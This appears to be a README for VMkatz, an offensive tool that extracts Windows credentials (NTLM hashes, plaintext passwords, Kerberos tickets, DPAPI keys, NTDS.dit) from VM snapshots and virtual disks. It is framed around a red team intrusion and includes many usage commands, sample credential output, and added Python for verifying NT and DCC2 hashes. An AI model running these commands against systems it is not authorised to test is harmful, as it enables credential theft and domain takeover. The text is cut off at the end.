VMkatz
Extract Windows credentials directly from VM memory snapshots and virtual disks
/learn @nikaiw/VMkatzREADME
Too Big to Steal
You are three weeks into a red team engagement. Your traffic crawls through a VPN, then bounces across four SOCKS proxies chained through compromised jump boxes before it touches the target network. Every packet takes the scenic route.
After days of lateral movement you land on a NAS attached to the virtualization cluster and the directory listing hits different: rows upon rows of .vmdk, .vmsn, .sav. Hundreds of gigabytes of virtual machines - domain controllers, admin workstations, the crown jewels - sitting right there.
But your link wheezes at 200 KB/s. Pulling a single 100 GB disk image would take six days, and every hour of sustained exfil is another chance the SOC spots the anomaly, burns your tunnel, and the whole chain collapses.
Without VMkatz, the traditional workflow looks like this: exfiltrate the entire VM disk or memory snapshot, mount it locally, install a full Windows analysis stack, load the snapshot into a debugger or use mimikatz on a booted copy, and manually piece together credentials from each VM - one at a time. Multiply that by a dozen VMs on the cluster and you are looking at days of bandwidth, tooling, and post-processing.
VMkatz exists because you shouldn't have to exfiltrate what you can read in place. It extracts Windows secrets - NTLM hashes, DPAPI master keys, Kerberos tickets, cached domain credentials, LSA secrets, NTDS.dit - directly from VM memory snapshots and virtual disks, on the NAS, the hypervisor, wherever the VM files are.
A single static binary, ~2.5 MB. Drop it on the ESXi host, the Proxmox node, or the NAS. Point it at a .vmsn, .vmdk, or an entire VM folder. Walk away with credentials, not disk images.
What It Extracts
From memory snapshots (LSASS)
All 9 SSP credential providers that mimikatz implements:
| Provider | Data | Notes |
| --- | --- | --- |
| MSV1_0 | NT/LM hashes, SHA1 | Physical-scan fallback for paged entries |
| WDigest | Plaintext passwords | Linked-list walk + .data fallback |
| Kerberos | AES/RC4/DES keys, tickets (.kirbi/.ccache) | AVL tree walk, often paged in VM snapshots |
| TsPkg | Plaintext passwords | RDP sessions only |
| DPAPI | Master key cache (GUID + decrypted key) | SHA1 masterkey for offline DPAPI decrypt |
| SSP | Plaintext credentials | SspCredentialList in msv1_0.dll |
| LiveSSP | Plaintext credentials | Requires livessp.dll (rare post-Win8) |
| Credman | Stored credentials | Hash-table + single-list enumeration |
| CloudAP | Azure AD tokens | Typically empty for local-only logon |
From virtual disks (offline)
- SAM hashes: Local account NT/LM hashes with account status (disabled, blank password)
- LSA secrets: Service account passwords, auto-logon credentials, machine account keys
- Cached domain credentials: DCC2 hashes (last N domain logons)
- DPAPI master keys: Hashcat-ready hashes from user master key files ($DPAPImk$, hashcat modes 15300/15310/15900/15910 for local/domain users)
- NTDS.dit: Full Active Directory hash extraction from domain controller disks, natively from the ESE database - no impacket or external tools needed
Supported Inputs
| Format | Extensions | Source | Status |
| --- | --- | --- | --- |
| VMware snapshots | .vmsn + .vmem | Workstation, ESXi | Tested |
| VMware embedded snapshots | .vmsn (no .vmem) | ESXi suspend / mainMem.useNamedFile=FALSE | Tested |
| VirtualBox saved states | .sav | VirtualBox | Tested |
| QEMU/KVM savevm states | auto-detected | Proxmox qm snapshot --vmstate, QEMU savevm | Tested |
| QEMU/KVM ELF core dumps | .elf | virsh dump, dump-guest-memory | Tested |
| Hyper-V saved states | .vmrs | Hyper-V 2016+ (native parser) | Untested |
| Hyper-V memory dumps | .bin, .raw | Legacy saved states, raw dumps | Untested |
| VMware virtual disks | .vmdk (sparse + flat) | Workstation, ESXi | Tested |
| VirtualBox virtual disks | .vdi | VirtualBox | Tested |
| QEMU/KVM virtual disks | .qcow2 | QEMU, Proxmox | Tested |
| Hyper-V virtual disks | .vhdx, .vhd | Hyper-V | Tested |
| VMFS-6 raw SCSI devices | /dev/disks/... | ESXi datastores (bypasses file locks) | Tested |
| LVM block devices | /dev/... | Proxmox LVM-thin, raw LVs | Tested |
| Raw registry hives | SAM, SYSTEM, SECURITY | Exported from disk or reg save | Tested |
| Raw NTDS.dit | ntds.dit + SYSTEM | Copied from domain controller | Tested |
| LSASS minidump | .dmp | --dump lsass, procdump, Task Manager | Tested |
| VM directories | any folder | Auto-discovers all processable files | Tested |
Target OS: Windows Server 2003 through Windows Server 2025 / Windows 11 24H2 (x86 PAE + x64, auto-detected).
Quick Start
```bash
# Build (default features: all hypervisors + disk + NTDS)
cargo build --release
# Extract LSASS credentials from a VMware snapshot
./vmkatz snapshot.vmsn
# Same, with pagefile resolution for paged-out creds
./vmkatz --disk disk.vmdk snapshot.vmsn
# Extract SAM/LSA/DCC2 from a virtual disk (auto-detected)
./vmkatz disk.vmdk
# Extract from raw registry hives (auto-detects SAM/SYSTEM/SECURITY)
./vmkatz SAM SYSTEM
./vmkatz SAM SYSTEM SECURITY
# Extract AD hashes from raw NTDS.dit + SYSTEM hive
./vmkatz ntds.dit SYSTEM
# Extract from VMFS-6 on ESXi (bypasses file locks on running VMs)
./vmkatz --vmfs-device /dev/disks/naa.xxx --vmdk 'MyVM/MyVM-flat.vmdk'
# List all VMs on a VMFS-6 datastore
./vmkatz --vmfs-device /dev/disks/naa.xxx --vmfs-list
# Extract from all VMs on a VMFS-6 datastore
./vmkatz --vmfs-device /dev/disks/naa.xxx
# Extract AD hashes from a domain controller disk (NTDS.dit)
./vmkatz --ntds /dev/pve/vm-102-disk-0
# Extract AD hashes with password history
./vmkatz --ntds --ntds-history dc-disk.qcow2
# Point at a VM folder and let it find everything
./vmkatz /path/to/vm-directory/
# List running processes
./vmkatz --list-processes snapshot.vmsn
# Dump LSASS as minidump (for pypykatz, etc.)
./vmkatz --dump lsass -o lsass.dmp snapshot.vmsn
# Output as hashcat-ready hashes (mode 1000)
./vmkatz --format hashcat snapshot.vmsn
# Output as NTLM pwdump format
./vmkatz --format ntlm snapshot.vmsn
# Export Kerberos tickets
./vmkatz --kirbi snapshot.vmsn   # export as .kirbi files
./vmkatz --ccache snapshot.vmsn  # export as .ccache file
# Extract from Proxmox VM savevm state (auto-detected QEVM format)
./vmkatz /dev/pve/vm-110-state-snapshot1
# Parse LSASS minidump
./vmkatz lsass.dmp
# Degraded extraction from truncated/partial memory
./vmkatz --carve partial-snapshot.vmsn
# Show all sessions including empty ones
./vmkatz --all snapshot.vmsn
```
Advanced options
```bash
# Recursively scan a directory tree for all VM files
./vmkatz -r /vmfs/volumes/datastore1/
# Filter to only snapshots or only disks in directory mode
./vmkatz --scan snapshot /path/to/vm/
./vmkatz --scan disk /path/to/vm/
# Filter output to specific providers
./vmkatz --provider msv,kerberos snapshot.vmsn
# Enable EPT scanning for VBS/Credential Guard VMs
./vmkatz --ept snapshot.vmsn
# Verbose output (memory regions, process list, debug info)
./vmkatz -v snapshot.vmsn
# Dump with custom Windows build number
./vmkatz --dump lsass --build 26100 -o lsass.dmp snapshot.vmsn
```
Output Formats
| Format | Flag | Description |
| --- | --- | --- |
| text | --format text (default) | Full credential dump with session metadata |
| brief | --format brief | Compact one-line-per-credential summary |
| ntlm | --format ntlm | DOMAIN\user:::hash::: pwdump format |
| hashcat | --format hashcat | Raw hashes: mode 1000 (NTLM), mode 2100 (DCC2), mode 15300/15900 (DPAPI) |
| csv | --format csv | Machine-readable, all fields |
In text mode, well-known blank password hashes (31d6cfe0... for NTLM, aad3b435... for LM) are annotated with (blank). SAM entries show account status: (DISABLED), (NO PASSWORD), (BLANK PASSWORD). DPAPI master keys are deduplicated to show only the most recent per user (use --all to see all keys).
Use --color auto|always|never to control colored terminal output (default: auto, detects TTY). Colors highlight usernames, section headers, interesting hashes, and plaintext passwords.
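The NT hashes in the hashcat and ntlm outputs and the DCC2 hashes from cached domain credentials are plain functions of the password and user name, so a cracked or guessed password can be checked against a line of output offline without touching the target again. The following Python is an added example written for this page, not code from VMkatz: it implements MD4 (OpenSSL 3 builds of `hashlib` frequently ship MD4 only in the legacy provider), the NT hash behind hashcat mode 1000, the MS-Cache v2 (DCC2) derivation behind mode 2100, and the blank-hash annotation described above. The `$DCC2$<iterations>#<user>#<hash>` layout follows hashcat's; the `user:rid:lm:nt:::` layout assumed by `parse_pwdump_line` is an assumption about the ntlm output, not taken from the tool, and the sample inputs are constructed.

```python
"""Added example (not VMkatz code): recompute the NT and DCC2 hashes that appear
in hashcat-mode (1000 / 2100) and pwdump-style output, and annotate blank hashes."""
import hashlib
import struct

_MASK = 0xFFFFFFFF
NT_BLANK = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4 of an empty UTF-16LE password
LM_BLANK = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; pure Python because OpenSSL 3 hashlib builds often lack it."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, message-word order, shift schedule, round constant)
        (lambda x, y, z: (x & y) | (~x & z),
         list(range(16)), (3, 7, 11, 19), 0x00000000),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                t = (a + f(b, c, d) + words[idx] + k) & _MASK
                a, b, c, d = d, _lrot(t, shifts[i % 4]), b, c  # rotate roles a->d->c->b
        h = [(u + v) & _MASK for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash (hashcat mode 1000): MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def dcc2(username: str, password: str, iterations: int = 10240) -> bytes:
    """MS-Cache v2 / DCC2 (hashcat mode 2100): PBKDF2-HMAC-SHA1 over the DCC1 value."""
    user = username.lower().encode("utf-16-le")
    dcc1 = md4(nt_hash(password) + user)  # MS-Cache v1 (hashcat mode 1100)
    return hashlib.pbkdf2_hmac("sha1", dcc1, user, iterations, dklen=16)


def check_dcc2_line(line: str, password: str) -> bool:
    """Verify a candidate password against a '$DCC2$<iter>#<user>#<hash>' line."""
    if not line.startswith("$DCC2$"):
        raise ValueError("not a DCC2 hashcat line")
    iters, user, digest = line[len("$DCC2$"):].split("#", 2)
    return dcc2(user, password, int(iters)).hex() == digest.lower()


def annotate_hash(hex_hash: str) -> str:
    """Tag the well-known empty-password NT/LM hashes the way the text output does."""
    h = hex_hash.lower()
    return f"{h} (blank)" if h in (NT_BLANK, LM_BLANK) else h


def parse_pwdump_line(line: str) -> dict:
    """Parse 'user:rid:lm:nt:::' (assumed pwdump layout) and flag blank NT hashes."""
    user, rid, lm, nt = line.split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": annotate_hash(lm),
            "nt": annotate_hash(nt), "blank_password": nt.lower() == NT_BLANK}


if __name__ == "__main__":
    # Constructed inputs; the DCC2 line is hashcat's published example hash for mode 2100.
    print(nt_hash("hashcat").hex())
    print(check_dcc2_line("$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f", "hashcat"))
    print(parse_pwdump_line(
        "svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"))
```

`check_dcc2_line` lowercases the user name before hashing, as Windows does when salting cached credentials, so a mixed-case name copied from output still verifies; the 10240 iteration count is the Windows default and is read from the line rather than hard-coded.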
Example Output
LSASS extraction (default text)
```text
$ vmkatz snapshot.vmsn
[*] Providers: MSV(ok) WDigest(ok) Kerberos(paged) TsPkg(empty) DPAPI(ok) SSP(empty) LiveSSP(n/a) Credman(empty) CloudAP(paged)
[+] 8 logon session(s), 3 with credentials:

LUID: 0x3e7 (SYSTEM)
  Username: YOURPC$
  Domain: WORKGROUP
  [DPAPI]
    GUID : 94e9f320-d4a0-4737-b34e-ab106f485c0e
    MasterKey : d0f110675ca73f39d1370bdfd...
    SHA1 MasterKey: ea72698de207dab9e01fd9ab63f322ae82b4a4bb

LUID: 0x240be
  Session: 2 | LogonType: Unknown
  Username: user
  Domain: YOURPC
  LogonServer: YOURPC
  SID: S-1-5-21-4247878743-2693906039-1959858616-1000
  [MSV1_0]
    NT Hash : bbf7d1528afa8b0fdd40a5b2531bbb6d
    SHA1 : 6ed12f1e60b17cfff120d753029314748b58aa05
    DPAPI : 6ed12f1e60b17cfff120d753029314748b58aa05
```
Hashcat mode
```text
$ vmkatz --format hashcat snapshot.vmsn
[*] Providers: MSV(ok) WDigest(ok) ...
bbf7d1528afa8b0fdd40a5b2531bbb6d
```
NTDS.dit extraction
```text
$ vmkatz --ntds /dev/pve/vm-102-disk-0
[+] NTDS Artifacts:
  Partition offset : 0x100000
  ntds.dit size : 20971520 bytes
  SYSTEM size : 14155776 bytes
  Bootkey : 9ae365ba5244457bfc2a26187a28346a
  Hashes extracted : 18
[+] AD NTLM Hashes:
RID: 500 Admini
```
